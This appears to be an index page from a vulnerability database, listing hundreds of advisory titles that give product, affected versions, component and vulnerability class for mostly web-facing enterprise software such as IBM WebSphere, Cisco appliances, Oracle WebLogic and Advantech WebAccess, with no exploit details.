[81748] Netscape iPlanet Web Server /.perf information disclosure [81729] Tmax Soft JEUS Web Application Server 3.1.4pl/3.2.2 url.jsp cross site scripting [81635] Cisco Prime Infrastructure up to 2.2.2 Web API RBAC privilege escalation [81404] IBM WebSphere Process Server up to 7.0.0.6 Business Space privilege escalation [81395] IBM WebSphere Application Server up to 8.5.5.8 OPenID Connect OIDC Client cross site scripting [81321] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9/8.0.0.2 Order privilege escalation [81153] Linux Kernel AIO Interface fs/aio.c memory corruption [81149] Cisco Web Security Appliance Web Proxy privilege escalation [81126] Synacor Zimbra Collaboration 8.0.9 Interface cross site request forgery [81124] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF09 XML Parser XML External Entity [81123] IBM WebSphere Portal cross site scripting [81122] IBM WebSphere Portal cross site scripting [81121] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9 privilege escalation [81116] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 cross site scripting [81115] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 cross site scripting [81114] IBM WebSphere Portal up to 7.0.0.2 CF29/8.0.0.1 CF19/8.5.0.0 CF08 Authoring UI privilege escalation [81113] IBM WebSphere Portal up to 8.0.0.1 CF19/8.5.0.0 CF08 Redirect [81059] Moodle up to 2.6.11/2.7.10/2.8.8/2.9.2 core_enrol_get_enrolled_users Web Service enrol/externallib.php privilege escalation [81013] Dell SonicWall up to 7.2/8.0/8.1 GMS ViewPoint Web Application privilege escalation [81011] Citrix Netscaler Application Delivery Controller up to 10.5 NS Web GUI Command privilege escalation [80967] IBM Security Access Manager for Web up to 8.0.1.3 IF3/9.0.0.1 cross site scripting [80965] IBM WebSphere Portal LDAP privilege escalation [80964] IBM WebSphere Commerce Enterprise 7.0.0.8/7.0.0.9 Update Installer information disclosure [80959] IBM Security Access Manager For Web Appliance up to 7.0.0 IF18/8.0.1.3 IF2/9.0.0.0 SSH weak encryption [80958] IBM Security Access Manager for Web up to 7.0.0 IF20/8.0.1.3 IF3/9.0.0.1 Login 7PK Security Features [80955] IBM Security QRadar SIEM up to 7.1 MR2 Patch 11 Web UI privilege escalation [80891] Adobe Connect up to 95.1 User Interface privilege escalation [80814] Cisco WebEx Meetings Server 2.5.1.5 cross site scripting [80716] Rockwell Automation Allen-Bradley MicroLogix 1100 up to 15.000 Web Request memory corruption [80707] IBM WebSphere Portal up to 8.5.0 CF08 cross site scripting [80637] IBM WebSphere Application Server up to 7.0.0.40/8.0.0.11/8.5.5.8 cross site scripting [80611] Cisco Web Security Appliance 8.5.3-055/9.1.0-000/9.5.0-235 Proxy Engine 7PK Security Features [80384] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 WLS-Console unknown vulnerability [80374] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Core Components unknown vulnerability [80373] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Coherence Container unknown vulnerability [80372] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Java Messaging Service unknown vulnerability [80371] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 XML Parser privilege escalation [80370] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 WLS Core Components unknown vulnerability [80369] Oracle WebLogic Portal 10.3.6 Core Services privilege escalation [80368] Oracle WebCenter Sites 7.6.2/11.1.1.8.0 privilege escalation [80313] IBM WebSphere Commerce up to 8.0.0.0 cross site scripting [80312] IBM WebSphere Commerce up to 8.0.0.0 cross site scripting [80308] IBM WebSphere MQ Light up to 1.0.1 MQXR Service denial of service [80290] Juniper Junos up to 14.2 J-Web privilege escalation [80277] Advantech WebAccess up to 8.0 BwpAlarm Subsystem memory corruption [80276] Advantech WebAccess up to 8.0 Kernel Service Numeric Error [80275] Advantech WebAccess up to 8.0 memory corruption [80274] Advantech WebAccess up to 8.0 memory corruption [80273] Advantech WebAccess up to 8.0 memory corruption [80272] Advantech WebAccess up to 8.0 File directory traversal [80271] Advantech WebAccess up to 8.0 File Upload privilege escalation [80270] Advantech WebAccess up to 8.0 information disclosure [80269] Advantech WebAccess up to 8.0 Folder privilege escalation [80268] Advantech WebAccess up to 8.0 memory corruption [80262] Advantech WebAccess up to 8.0 Browser Plugin privilege escalation [80256] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.9/7.0 FP8 cross site request forgery [80255] Advantech WebAccess up to 8.0 cross site scripting [80254] Advantech WebAccess up to 8.0 sql injection [80253] Advantech WebAccess up to 8.0 cross site request forgery [80252] Advantech WebAccess up to 8.0 information disclosure [80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting [80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting [80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80214] Microsoft Windows up to Vista SP2 Graphics Device Interface GDI32.dll information disclosure [80175] IBM WebSphere Message Broker up to 7.0.0.7/8.0.0.5 HTTP Server information disclosure [80132] IBM WebSphere Commerce up to 7.0 FP8 Aurora Starter Redirect [80001] IBM WebSphere MQ Light up to 1.0.1 MQXR Service Code [80000] IBM WebSphere MQ Light up to 1.0.1 TLS Handshake Code [79919] IBM WebSphere Portal 6.1/7.0/8.0/8.5 AccessControl REST API information disclosure [79879] Schneider Electric Modicon M340 BMXNOx/BMXPx GoAhead Web Server memory corruption [79823] Cisco Unified Communications Manager 10.5(0.98000.88) WebApplications Identity Management Subsystem denial of service [79776] IBM InfoSphere Bigesights 3.0/3.0.0.1/3.0.0.2 HiveServer2 Interface weak authentication [79746] IBM WebSphere Application Server 8.0/8.5/8.5.5 Edge Component Caching Proxy information disclosure [79418] Cisco WebEx Meetings Application up to 8.5.0 on Android privilege escalation [79409] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting [79408] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting [79407] IBM WebSphere Portal 6.1/7.0/8.0/8.5 cross site scripting [79406] IBM WebSphere Portal 6.1/7.0/8.0/8.5 Document Upload denial of service [79346] Cisco Web Security Appliance 8.0.7-142/8.5.1-021 Native FTP denial of service [79298] Cisco ASA 8.4 Management Interface denial of service [79272] Exemys Telemetry Web Server HTTP Location Header privilege escalation [79244] Apache CXF up to 2.7.17/3.0.7/3.1.2 SAML Web SSO Module privilege escalation [79243] Oracle WebLogic Server 10.3.6.0/12.1.2.0/12.1.3.0/12.2.1.0 WLS Security com.bea.core.apache.commons.collections.jar privilege escalation [79213] IBM WebSphere Portal up to 8.0.0.1 CF18/8.5.0 CF08 denial of service [79210] Cisco IOS 15.2(04)M/15.4(03)M Virtual PPP Interface ACL privilege escalation [79114] SAP HANA DB 1.00.73.00.389160 SQL Interface privilege escalation [79111] SAP HANA DB 1.00.73.00.389160 Web Dispatcher Service information disclosure [79077] IBM WebSphere Commerce Enterprise up to 7.0.0.8 REST URL information disclosure [79074] IBM Security Access Manager For Web up to 7.0.0.15/8.0.1.2 WebSEAL HTTPTransformation Request File Code [79070] IBM WebSphere Application Server up to 6.1.0.47/7.0.0.38/8.0.0.11/8.5.5.7 privilege escalation [79049] Cisco Web Security Appliance 8.5.3-051 File-Range Request denial of service [79047] Cisco Web Security Appliance 8.5.3-051 Proxy Cache denial of service [78944] IBM WebSphere Portal up to 8.5.0 CF07 privilege escalation [78910] IBM WebSphere Portal privilege escalation [78876] Red Hat JBoss Enterprise Application Platform up to 6.4.3 HTTP Management Interface memory corruption [78875] Red Hat JBoss Enterprise Application Platform up to 6.4.3 EAP Web Console Mouse 7PK Security Features [78874] Red Hat JBoss Enterprise Application Platform up to 6.4.3 EAP Web Console cross site request forgery [78866] Cisco Wireless LAN Controller 7.4(140.0)/8.0(120.0) Web Management GUI privilege escalation [78863] IniNet embeddedWebServer up to 2.01 Path directory traversal [78862] IniNet embeddedWebServer up to 2.01 URL Encoding File privilege escalation [78861] IniNet embeddedWebServer up to 2.01 HTTP Request memory corruption [78658] Oracle Integrated Lights Out Manager (ILOM) 3.0/3.1/3.2 Web unknown vulnerability [78575] Oracle Fusion Middleware 7.6.2/11.1.1.6.1/11.1.1.8.0 WebCenter Sites unknown vulnerability [78574] Oracle Fusion Middleware 10.1.3.5.1 WebCenter Content unknown vulnerability [78573] Oracle Fusion Middleware 10.1.3.5.1 WebCenter Content unknown vulnerability [78568] Oracle Fusion Middleware 7.6.2/11.1.1.6.1/11.1.1.8.0 WebCenter Sites privilege escalation [78501] Juniper Junos up to 15.1 on vSRX J-Web denial of service [78492] SAP HANA 1.00.091.00.1418659308 Web-Based Development Workbench test-net.xsjs privilege escalation [78491] SAP HANA DB 1.00.73.00.389160 Web-Based Development Workbench cross site scripting [78489] SAP HANA DB 1.00.091.00.1418659308 Web-Based Development Workbench cross site scripting [78374] Microsoft SharePoint Server/Office Web Apps cross site scripting [78357] Cisco Prime Collaboration Assurance 10.5(1) Web Framework information disclosure [78247] Canary Labs Trend Web Server up to 9.5.1 TCP Packet memory corruption [78224] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 cross site scripting [78223] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Lockout weak authentication [78222] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Session weak authentication [78221] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 privilege escalation [78220] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Logout privilege escalation [78219] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 cross site request forgery [78218] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0 Session Cookie information disclosure [78206] IBM Content Template Catalog/WebSphere Portal cross site scripting [78152] Splunk Enterprise up to 6.2.5 Web cross site scripting [78066] Advantech WebAccess up to 8.0 memory corruption [78063] Schneider Electric InduSoft Web Studio up to 7.x Remote Agent privilege escalation [77947] Cisco Prime Collaboration Provisioning up to 10.x Web Framework privilege escalation [77946] Cisco Prime Collaboration Assurance up to 10.5.1 Web Framework privilege escalation [77945] Cisco Prime Collaboration Assurance up to 10.5.1 Web Framework privilege escalation [77761] Symantec Web Gateway 5.2.2 PHP Script sql injection [77759] Symantec Web Gateway 5.2.2 privilege escalation [77758] Symantec Web Gateway 5.2.2 admin_messages.php privilege escalation [77757] Symantec Web Gateway 5.2.2 PHP Script cross site scripting [77756] Symantec Web Gateway 5.2.2 Console privilege escalation [77699] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site scripting [77698] JSP/MySQL Administrador Web 1 sys/sys/listaBD2.jsp cross site request forgery [77692] IBM WebSphere Commerce 7.0.0.6/7.0.0.7/7.0.0.8/7.0.0.9 information disclosure [77691] IBM WebSphere Portal denial of service [77672] Moxa EDS-405A/EDS-408A up to 3.5 GoAhead Web Server denial of service [77663] IBM WebSphere MQ up to 7.0.1.12 MQI Call denial of service [77662] Advantech WebAccess up to 8.0.0 DLL File memory corruption [77658] Cisco Web Security Appliance 8.0.7 TCP Connection Close memory corruption [77657] Cisco Web Security Appliance 8.0.6-078/8.0.6-115 DNS Processer denial of service [77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure [77492] OkCupid OK Web Server 404 Error Message libahttp/err.c cross site scripting [77377] IBM Integration Bus/WebSphere Message Broker Security Profile information disclosure [77370] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 information disclosure [77369] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 Servlet weak authentication [77357] EMC WebTop cross site request forgery [77332] Cisco WebEx Node for Media Convergence Server Redirect [77273] pfSense up to 2.2.2 WebGUI services_captiveportal_zones.php cross site scripting [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [76939] Websense Triton Content Manager 8.0.0 handle_debug_network memory corruption [76907] GE Healthcare Optima MR360 HIPAA Configuration Interface privilege escalation [76897] IBM WebSphere eXtreme Scale up to 8.6.0.8 denial of service [76852] Fortinet FortiOS up to 5.2.3 DHCP Monitor Web UI cross site scripting [76843] Cisco UCS Central Software 1.3(0.99) Web Framework File privilege escalation [76830] Cisco Web Security Appliance 8.3.6-048/8.5.0-000/8.5.7-042 LDAP weak encryption [76827] Cisco Web Security Appliance 8.5.6-113/9.1.0-032/9.1.1-000/9.6.0-000 cross site scripting [76812] Ruby on Rails up to 3.x/4.x Web Console request.rb Blacklist privilege escalation [76805] Cisco Unified MeetingPlace Web Conferencing up to 8.5/8.6 Password Change privilege escalation [76799] EMC Avamar Server up to 7.1.1 Desktop/Laptop Interface information disclosure [76791] Cisco WebEx Meetings Server 2.5 MR1 cross site request forgery [76762] Cisco WebEx Meeting Center Admin Site cross site scripting [76761] Cisco WebEx Meeting Center cross site scripting [76760] Cisco WebEx Training Center cross site scripting [76657] Cisco WebEx Meetings Server 2.5MR1 privilege escalation [76644] Oracle Fusion Middleware 11.1.1.7.0 Web Cache unknown vulnerability [76638] Oracle E-Business Suite up to 12.2.4 Web Management unknown vulnerability [76631] Oracle E-Business Suite 11.5.10.2/12.0.6/12.1.3/12.2.3/12.2.4 Web Applications Desktop Integrator unknown vulnerability [76446] IBM WebSphere Portal up to 8.0.0.1 CF16/8.5.0 CF05 cross site scripting [76445] IBM WebSphere Application Server up to 8.0.0.10/8.5.5.5 Administrative Console privilege escalation [76444] IBM WebSphere Application Server up to 7.0.038/8.0.0.10/8.5.5.5 Webcontainer privilege escalation [76443] IBM WebSphere Portal Active Content Filtering cross site scripting [76442] IBM WebSphere Portal up to 7.0.0.2 CF29/8.0.0.1 CF16/8.5.0 CF5 Java Content Repository information disclosure [76419] Cisco WebEx Meeting Center cross site scripting [76197] Apple Mac OS X 10.9.5/10.10/10.10.1/10.10.2/10.10.3 Bluetooth HCI Interface memory corruption [76173] IBM WebSphere MQ up to 8.0.0.2 MQ Explorer TLS information disclosure [76162] Cisco Unified Communications Domain Manager 8.1(4)ER1 Web Framework information disclosure [76131] IBM WebSphere Commerce up to 6.0.0.11/7.0.0.8 HTTP Header privilege escalation [76115] IBM Tivoli Security Directory Server up to 6.4 Web Admin Tool privilege escalation [76103] IBM WebSphere Message Broker Toolkit MQ Client TLS weak encryption [76098] IBM Unified Extensible Firmware Interface Legacy Boot Mode denial of service [76091] Cisco Web Security Appliance SSH Host Key weak encryption [76090] Cisco Web Security Appliance SSH Key information disclosure [76071] Cisco WebEx Meeting Center Credentials information disclosure [76070] Cisco WebEx Meeting Center sql injection [76051] Cisco WebEx Meeting Center cross site scripting [76050] Cisco WebEx Meeting Center Calendar information disclosure [76049] Cisco WebEx Meeting Center Meeting Registration Page information disclosure [76033] Cisco Web Security Appliance 8.5.0-497 Header cross site scripting [76028] Cisco Web Security Appliance 8.5.0-497 HTTP Header cross site scripting [76018] IBM Lotus Domino Web Server up to 8.5.3 FP6/9.0.1 FP3 WebMail cross site scripting [76014] IBM WebSphere MQIPT up to 2.1.0.1 Session ID Generator Code [75835] Magnifica Webscripts Anima Gallery 2.6 func.php directory traversal [75676] SAP HANA Web-Based Development Workbench sql injection [75662] Synology Photo Station 6.2-2858 /photo/webapi/photo.php sql injection [75599] Cisco Identity Services Engine 1.2(1.901)/1.3(0.722) Web Framework information disclosure [75594] AVM FRITZ!Box cgi-bin/webcm privilege escalation [75522] IBM WebSphere Portal up to 8.0.0.1/8.5.0 Redirect [75517] IBM WebSphere Portal up to 8.5 CF05 denial of service [75512] Cisco TelePresence Web Framework privilege escalation [75510] Cisco Hosted Collaboration Solution up to 10.6(1) Admin Interface privilege escalation [75507] Huawei E355s Mobile WiFi up to 22.158 WebUI information disclosure [75488] IBM WebSphere MQ up to 7.5.0.4/8.0.0.1 Cluster Repository Manager denial of service [75424] Wireshark up to 1.12.4 WebSocket Dissector denial of service [75415] Cisco Web Security Appliance 8.5.0-497 Web Tracking Report Page cross site scripting [75390] Cisco WebEx Meetings Server 2.5/2.5.0.997 URL cross site scripting [75230] Cisco Wireless LAN Controller 7.5.102.0/7.5.102.11/7.6.100.0 Web Authentication denial of service [75197] IBM WebSphere Application Server 6.1/7.0/8.0/8.5/8.5.5 Service privilege escalation [75148] Oxide WebServer up to 1.6.4 picker memory corruption [75146] InFocus IN3128HD Projector 0.26 webctrl.cgi.elf privilege escalation [75120] IBM WebSphere MQ up to 8.0.0.1 WMQ Telemetry cross site scripting [75115] TinyWebGallery up to 1.8.7 admin/index.php cross site scripting [75114] TinyWebGallery up to 1.8.7 admin/index.php cross site request forgery [75099] IBM WebSphere Application Server 8.5 Run-as EJB race condition [75098] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 Oauth privilege escalation [75097] IBM WebSphere Application Server 8.5 Liberty Profile privilege escalation [75096] IBM WebSphere Application Server 8.5 SNMP information disclosure [75095] IBM WebSphere Portal 6.1/6.1.5/7.0.0.2/8.0.0.1/8.5 cross site scripting [75094] IBM WebSphere Portal 6.1/6.1.5/7.0.0.2/8.0.0.1/8.5 denial of service [74984] Cisco IOS XR up to 5.3.0 on ASR 9000 Bridge-Group Virtual Interface Traffic Hang Data Processing Error [74975] Cisco Web Security Appliance 8.5.0-497 cross site scripting [74914] Oracle JD Edwards EnterpriseOne Technology 9.1 Web Runtime Security unknown vulnerability [74890] Oracle WebCenter Portal 11.1.1.8.0 WebCenter Spaces Application unknown vulnerability [74889] Oracle WebCenter Portal 11.1.1.8.0 Portlet Services unknown vulnerability [74887] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0 Console unknown vulnerability [74886] Oracle WebCenter Sites 7.6.2/11.1.1.6.1/11.1.1.8.0 MultipartStream.java privilege escalation [74885] Oracle WebCenter Sites 11.1.1.6.1/11.1.1.8.0 Community privilege escalation [74882] Oracle WebLogic Server 12.1.2.0/12.1.3.0 WLS-WebServices unknown vulnerability [74880] Oracle iPlanet Web Server 6.1/7.0 Network Security Service weak encryption [74879] Oracle iPlanet Web Proxy Server 4.0 Network Security Service weak encryption [74786] Juniper Junos up to 14.2 J-Web privilege escalation [74780] pfSense up to 2.2.0 WebGUI system_firmware_restorefullbackup.php cross site request forgery [74756] Apple MacOS X up to 10.10.2 WebKit denial of service [74648] IBM WebSphere DataPower XC10 up to 2.1.0.2 privilege escalation [74588] pfSense Firewall up to 2.2.0 WebGUI cross site scripting [74584] OpenStack Compute up to 2014.2.2 Websocket weak authentication [74571] Websense TRITON up to 7.x unknown vulnerability [74570] Websense TRITON up to 7.x unknown vulnerability [74569] Websense TRITON AP-EMAIL up to 7.x information disclosure [74568] Websense TRITON up to 7.x cross site request forgery [74566] Websense TRITON AP-EMAIL up to 7.x cross site scripting [74565] Websense TRITON AP-EMAIL up to 7.x unknown vulnerability [74564] Websense TRITON AP-EMAIL up to 7.x privilege escalation [74563] Websense TRITON AP-EMAIL up to 7.x privilege escalation [74562] Websense TRITON AP-DATA up to 7.x cross site scripting [74561] Websense TRITON AP-EMAIL up to 7.x unknown vulnerability [74560] Websense TRITON AP-WEB up to 7.x information disclosure [74559] Websense TRITON AP-WEB up to 7.x cross site scripting [74546] IBM Security Access Manager for Web up to 7.x information disclosure [74529] Websense TRITON up to 7.8.2 information disclosure [74492] Websense Web Security up to 7.x Explorer explorer_wse/ information disclosure [74491] Websense Data Loss Prevention 7.8.3 cross site scripting [74484] Websense TRITON AP-WEB up to 7.8.2 Data Security Block Page moreBlockInfo.cgi cross site scripting [74483] Websense TRITON AP-EMAIL up to 7.8.2 cross site scripting [74478] Websense TRITON AP-WEB up to 7.8.2 Explorer Report Scheduler WsCgiExplorerSchedule.exe cross site scripting [74445] Web-Dorado Ecommerce Wd 1.2.5 Search index.php sql injection [74411] IBM WebSphere Commerce up to 7.0 Privileges unknown vulnerability [74340] Web-Dorado Spider Calendar 1.4.9 admin/ wp-admin/admin-ajax.php sql injection [74332] Kent-web Clip Board up to 4.1 Web CLI unknown vulnerability [74281] D-Link DIR-645 up to 1.04b12 Interface Wired/Wireless memory corruption [74280] D-Link DIR-645 up to 1.04b12 Interface Wired/Wireless privilege escalation [74245] Zarafa Collaboration Platform up to 7.1.10 WebAccess senddocument.php denial of service [74234] Cisco Hosted Collaboration Solution SOAP Interface privilege escalation [74200] IBM Tivoli Endpoint Manager up to 9.1.1116 Web Reports cross site scripting [74185] IBM WebSphere Portal up to 7.0.0.0 cross site scripting [74177] IBM WebSphere MQ up to 7.4 Privileges denial of service [74167] Web-Dorado Spider Facebook up to 1.0.9 Facebook Plugin wp-admin/admin.php cross site scripting [74129] Fabrice Bellard QEMU Websocket Frame Decoder denial of service [74128] Viber 4.3.0.712 on Android Javascript Interface privilege escalation [74094] Websense Triton 7.8.3 JSP URL Source information disclosure [74093] Websense Triton 7.8.3 Explorer /explorer_wse File privilege escalation [74062] Cisco WebEx Meetings Server 2.5 Administration Portal cross site scripting [74060] Websense Triton 7.8.3 Data Security Block Page cross site scripting [74059] Websense Triton 7.8.3 Explorer Report Scheduler cross site scripting [74058] Websense Triton 7.8.3 Data Security DLP cross site scripting [74057] Websense Email Security 7.8.3 cross site scripting [73937] IBM WebSphere Portal 8.5 weak encryption [73936] IBM WebSphere Portal 8.0/8.5 weak encryption [73935] IBM WebSphere Portal 8.0/8.5 cross site request forgery [73827] Web-Dorado Photo Gallery up to 1.2.8 sql injection [73818] IBM WebSphere Message Broker up to 8.0.0.4 HTTPInput Node information disclosure [73804] Jakweb Gecko CMS 2.2 cross site request forgery [73803] Jakweb Gecko CMS 2.2 sql injection [73802] Jakweb Gecko CMS 2.2 cross site scripting [73698] Clorius Controls A Java Web Client up to 01.00.x information disclosure [73673] Web-Dorado Photo Gallery 1.2.7 sql injection [73517] EMC Documentum WDK up to 6.6 webtop Numeric Error [73466] Efssoft Easy File Sharing Web Server 6.8 cross site scripting [73414] Splunk Web up to 5.0.5 cross site scripting [73367] IBM WebSphere Service Registry/Repository up to 7.5.0.2 cross site scripting [73366] IBM WebSphere Service Registry/Repository up to 7.5.0.1 cross site request forgery [73365] IBM WebSphere Service Registry/Repository up to 7.5.0.2 Access Restriction privilege escalation [73364] IBM WebSphere Service Registry/Repository up to 7.0.0.1 Registry privilege escalation [73363] IBM WebSphere Service Registry/Repository cross site scripting [73362] IBM WebSphere Service Registry/Repository cross site scripting [73361] IBM WebSphere Service Registry/Repository cross site scripting [73360] IBM WebSphere Service Registry/Repository up to 7.5.0.1 Registry privilege escalation [73359] IBM WebSphere Service Registry/Repository up to 7.5.0.4 Registry directory traversal [73358] IBM WebSphere Service Registry/Repository up to 7.5.0.4 Registry weak encryption [73357] IBM WebSphere Service Registry/Repository up to 7.5.0.4 cross site scripting [73300] IBM WebSphere Portal up to 8.5.0.0 cross site scripting [73299] IBM WebSphere Portal up to 8.5.0.0 privilege escalation [73297] IBM WebSphere Portal up to 8.5.0.0 cross site scripting [73295] IBM WebSphere Application Server up to 8.5.0.0 privilege escalation [73294] IBM WebSphere Application Server up to 7.0.0.14 7PK Security Features [73293] IBM WebSphere Application Server up to 7.0.0.14 cross site scripting [73292] IBM WebSphere Application Server up to 8.0.0.6 XML External Entity [73291] IBM WebSphere Application Server up to 8.0.0.6 information disclosure [73290] IBM Security Access Manager for Web Data Processing Error [73289] IBM Security Access Manager for Web information disclosure [73288] IBM Security Access Manager for Web weak encryption [73287] IBM Security Access Manager for Web information disclosure [73286] IBM Security Access Manager for Web weak encryption [73285] IBM Security Access Manager for Web information disclosure [73284] IBM Security Access Manager for Web denial of service [73283] IBM Security Access Manager for Web sql injection [73282] IBM Security Access Manager for Web privilege escalation [73281] IBM Security Access Manager for Web cross site request forgery [73280] IBM Security Access Manager for Web 7PK Security Features [73206] IBM WebSphere Portal up to 8.0.0.1 cross site scripting [73197] Cisco Unified Communications Domain Manager 8.0 Web Framework privilege escalation [73119] KENT-WEB Clip Board up to 2.91 cross site scripting [72992] IBM WebSphere Portal up to 8.5.0.0 cross site scripting [72967] Moodle up to 2.7.2 Web Service externallib.php privilege escalation [72964] Moodle up to 2.7.2 Web Service grades_external.php information disclosure [72841] webEdition CMS 6.3.8.0 showTempFile.php directory traversal [72837] SAP HANA Web-based Development Workbench cross site scripting [72810] IBM WebSphere Commerce up to 6.0.0.11 XML External Entity [72808] IBM WebSphere Commerce up to 6.0.0.11 XML External Entity [72754] Cisco Unified Communications Manager Admin Interface cross site scripting [72740] IBM WebSphere Portal cross site scripting [72739] IBM WebSphere Portal cross site request forgery [72738] IBM WebSphere Portal up to 8.5.0.0 information disclosure [72737] IBM WebSphere Portal up to 8.5.0.0 denial of service [72736] IBM WebSphere Portal up to 7.0.0.0 memory corruption [72663] Websupporter WP AmASIN - The Amazon Affiliate Shop up to 0.9.6 reviews.php directory traversal [72395] Okacloud Domain Name Search / Web Host 0.64.13398.55733 X.509 Certificate weak encryption [72150] IBM WebSphere MQ up to 8.0.0.0 weak authentication [72125] IBM WebSphere Application Server up to 7.0.0.14 privilege escalation [71972] Php Resource Voice Of Web AllMyGuests 0.4.1 admin.php sql injection [71971] Php Resource Voice Of Web AllMyGuests 0.4.1 index.php cross site scripting [71930] cloudacl Safe Browser - The Web Filter 1.2.5 X.509 Certificate weak encryption [71914] IBM WebSphere Portal up to 8.0 information disclosure [71775] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 Administration Console privilege escalation [71774] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 denial of service [71728] IBM WebSphere MQ Access Restriction privilege escalation [71725] IBM WebSphere DataPower XC10 appliance Privileges information disclosure [71724] IBM WebSphere DataPower XC10 appliance Administrative Console information disclosure [71499] IBM WebSphere Application Server up to 7.0.0.15 Administrative Console cross site request forgery [71498] IBM WebSphere Application Server up to 7.0.0.15 cross site scripting [71363] Advantech WebAccess 7.2 memory corruption [71362] Advantech WebAccess 7.2 memory corruption [71361] Advantech WebAccess 7.2 memory corruption [71360] Advantech WebAccess 7.2 memory corruption [71359] Advantech WebAccess 7.2 memory corruption [71358] Advantech WebAccess 7.2 memory corruption [71357] Advantech WebAccess 7.2 memory corruption [71356] Advantech WebAccess 7.2 memory corruption [71354] Phorum up to 5.2.18 Admin Interface cross site scripting [71225] IBM WebSphere Portal up to 8.0 denial of service [71224] IBM WebSphere Portal up to 8.5.0.0 cross site scripting [71223] Cisco Unified Communications Manager 9.1 Web Framework cross site scripting [71194] Imperva SecureSphere Web Application Firewall 9.0 cross site scripting [71071] Web Browser for Android 1.2 X.509 Certificate weak encryption [70699] IBM WebSphere Application Server up to 8.5.0.1 privilege escalation [70698] IBM WebSphere Application Server up to 8.0.0.6 denial of service [70696] IBM WebSphere Application Server up to 7.0.0.14 privilege escalation [70695] IBM WebSphere Application Server up to 8.0.0.6 Access Restriction privilege escalation [70694] IBM WebSphere Application Server up to 7.0.0.14 information disclosure [70693] IBM WebSphere Application Server up to 7.0.0.14 information disclosure [70674] EMC Documentum Webtop up to 6.6 cross site request forgery [70672] EMC Documentum WebTop up to 6.6 cross site scripting [70634] IBM Websphere Datapower Soa Appliance up to 5.0.0 weak encryption [70588] IBM WebSphere Real Time memory corruption [70580] Cisco Unity Connection up to 9.1 Web Framework sql injection [70555] IPython Notebook up to 1.1.0 WebSocket privilege escalation [70542] Efssoft Easy File Sharing Web Server 6.8 cross site scripting [70509] IBM WebSphere Portal up to 7.0.0.2 cross site scripting [70508] IBM WebSphere Portal up to 7.0.0.2 information disclosure [70507] IBM WebSphere Portal up to 7.0.0.2 sql injection [70506] IBM WebSphere Portal up to 7.0.0.2 Redirect [70391] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control information disclosure [70390] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control information disclosure [70389] Advantech WebAccess 5.0/6.0/7.0/7.1 upAdminPg.asp information disclosure [70388] Advantech WebAccess 5.0/6.0/7.0/7.1 unknown vulnerability [70387] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control webvact.ocx memory corruption [70147] IBM WebSphere Application Server up to 7.0.0.14 information disclosure [70129] IBM Security Access Manager For Mobile Software up to 8.0 Management Interface weak authentication [70128] IBM Security Access Manager For Web Appliance 8.0 Configuration [70088] IBM WebSphere Portal up to 7.0.0.0 cross site scripting [70041] webEdition CMS 6.2.7.0/6.3.3.0/6.3.8.0 we_fs.php sql injection [69975] Cisco Unified Communications Domain Manager Web Framework privilege escalation [69974] Cisco Unified Communications Domain Manager Web Framework privilege escalation [69871] IBM WebSphere Service Registry/Repository up to 7.5.0.3 cross site scripting [69860] Cisco Unified Communications Domain Manager up to 9.0 Web Framework unknown vulnerability [69801] Cisco NX-OS up to 6.x Management Interface privilege escalation [69795] IBM WebSphere Commerce up to 7.0 privilege escalation [69761] IBM WebSphere Portal up to 7.0.0.1 privilege escalation [69760] IBM WebSphere Portal up to 7.0.0.1 Redirect [69754] Efssoft Easy File Sharing Web Server 6.8 memory corruption [69727] Mahara up to 1.7.2 lib/web.php cross site scripting [69707] IBM WebSphere Portal up to 7.0.0.0 directory traversal [69706] IBM WebSphere Portal up to 7.0.0.0 cross site scripting [69656] Netweblogic Events Manager up to 5.2 index.php cross site scripting [69587] Red Hat JBoss Web Framework Kit 2.5.0 cross site scripting [69560] IBM WebSphere Application Server up to 8.5.0.1 information disclosure [69559] IBM WebSphere Application Server up to 7.0.0.14 denial of service [69558] IBM WebSphere Application Server up to 8.0.0.6 Administrative Console information disclosure [69557] IBM WebSphere Application Server up to 8.0.0.6 information disclosure [69556] IBM WebSphere Application Server up to 7.0.0.26 Administration Console cross site scripting 